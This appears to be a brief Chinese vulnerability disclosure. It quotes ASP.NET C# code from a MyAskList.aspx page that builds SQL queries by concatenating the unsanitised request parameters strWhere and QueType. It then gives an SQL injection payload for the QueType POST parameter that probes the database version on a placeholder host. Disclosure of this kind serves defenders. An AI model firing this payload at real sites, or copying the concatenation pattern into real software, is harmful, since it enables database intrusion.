<p>/Guest/ask/MyAskList.aspx</p><pre class="">protected void Page_Load(object sender, EventArgs e)
{
string str = "";
if (!base.IsPostBack)
{
DataTable table;
if (this.b_User.CheckLogin())
{
this.user.Text = this.b_User.GetLogin().UserName;
string userName = this.b_User.GetLogin().UserName;
str = " And UserName<>'" + userName + "'";
}
if (!string.IsNullOrEmpty(base.Request["strWhere"]))
{
table = this.b_Ask.Sel("Qcontent LIKE '%" + base.Request["strWhere"] + "%'" + str + " And Status=1", " AddTim e desc");
}
else if (string.IsNullOrEmpty(base.Request["strWhere"]) && !string.IsNullOrEmpty(base.Request["QueType"]))
{
table = this.b_Ask.Sel("QueType LIKE '%" + base.Request["QueType"] + "%' " + str + " And Status=1", " AddTime desc");
}
else
{
table = this.b_Ask.Sel("Status=1 " + str, " AddTime desc");
}
string str3 = "";
string item = "";
IList<string> list = new List<string>();
Repeater repeater = new Repeater();
if (table != null)
{
foreach (DataRow row in table.Rows)
{
if (string.IsNullOrEmpty(str3))
{
item = row["Qcontent"].ToString();
list.Add(item);
}
}
}
repeater.DataSource = list;
repeater.DataBind();
if (table != null)
{
this.Bind(table);
}
if (table != null)
{
table.Dispose();
}
list.Clear();
}
}
</pre><p>able = this.b_Ask.Sel("QueType LIKE '%" +base.Request["QueType"] + "%' " + str + " AndStatus=1", " AddTime desc");</p><p>这里QueType也没处理直接传入数据库,导致SQL注入</p><p><br></p><p><br></p><p>漏洞利用过程</p><p>访问</p><p><a href="http://xxx.com/Guest/ask/" rel="nofollow">http://xxx.com/Guest/ask/</a>MyAskList.aspx</p><p>post提交</p><p>QueType='and (select @@version)>0 and '%'=' </p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434685163694-1.png" data-image-size="865,701"><br></p>
暂无评论